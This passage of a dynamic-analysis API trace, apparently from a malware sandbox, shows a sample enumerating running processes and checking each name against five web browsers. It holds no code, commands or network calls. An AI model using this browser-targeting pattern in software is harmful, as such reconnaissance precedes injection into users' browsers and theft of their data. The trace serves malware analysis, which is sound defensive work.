lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.654] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.654] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.654] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0228.655] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0228.655] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0228.655] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0228.655] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0228.655] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.655] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.655] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.655] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.655] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.655] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.655] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.655] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.656] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.656] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.656] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.656] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.656] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.656] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0228.656] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0228.656] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0228.656] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0228.656] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0228.657] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.657] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0228.657] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0228.657] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0228.657] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0228.657] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0228.657] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.657] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.658] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0228.658] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0228.658] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0228.658] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0228.658] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.658] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.658] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.658] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.658] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.658] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.658] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.658] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.659] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0228.659] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0228.659] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0228.659] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0228.659] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.659] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0228.660] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0228.660] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0228.660] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0228.660] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0228.660] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.660] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0228.660] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0228.660] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0228.660] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0228.660] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0228.660] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.660] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0228.661] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0228.661] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0228.661] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0228.661] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0228.661] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.661] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0228.661] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0228.661] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0228.661] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0228.661] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0228.661] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.661] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0228.662] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0228.662] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0228.662] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0228.662] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0228.662] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.662] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0228.662] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0228.663] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0228.663] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0228.663] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0228.663] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.663] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0228.663] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0228.663] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0228.663] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0228.663] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0228.663] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.663] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0228.664] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0228.664] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0228.664] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0228.664] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0228.664] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.664] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0228.664] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0228.664] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0228.664] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0228.664] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0228.664] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.664] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0228.665] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0228.665] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0228.665] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0228.665] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0228.665] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.665] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0228.666] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0228.666] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0228.666] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0228.666] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0228.667] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.667] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0228.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0228.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0228.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0228.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0228.668] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.668] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0228.668] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0228.668] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0228.668] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0228.668] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0228.668] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.668] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0228.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0228.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0228.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0228.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0228.669] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.669] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0228.669] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0228.669] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0228.669] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0228.669] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0228.669] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.670] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0228.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0228.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0228.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0228.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0228.670] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.670] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0228.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0228.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0228.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0228.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0228.671] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.671] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0228.671] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0228.671] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0228.671] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0228.671] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0228.671] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.671] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0228.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0228.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0228.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0228.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0228.672] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.672] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0228.672] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0228.672] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0228.672] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0228.672] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0228.672] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0228.672] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0228.673] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0228.673] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0228.673] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0228.673] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0228.673] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.673] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0228.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0228.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0228.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0228.674] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.674] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.674] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.674] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.674] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.674] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.674] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.674] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0228.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0228.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0228.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0228.675] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.675] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.675] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0228.675] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0228.676] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0228.676] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0228.676] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.676] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.676] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0228.676] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0228.676] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0228.676] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0228.676] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0228.676] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.677] 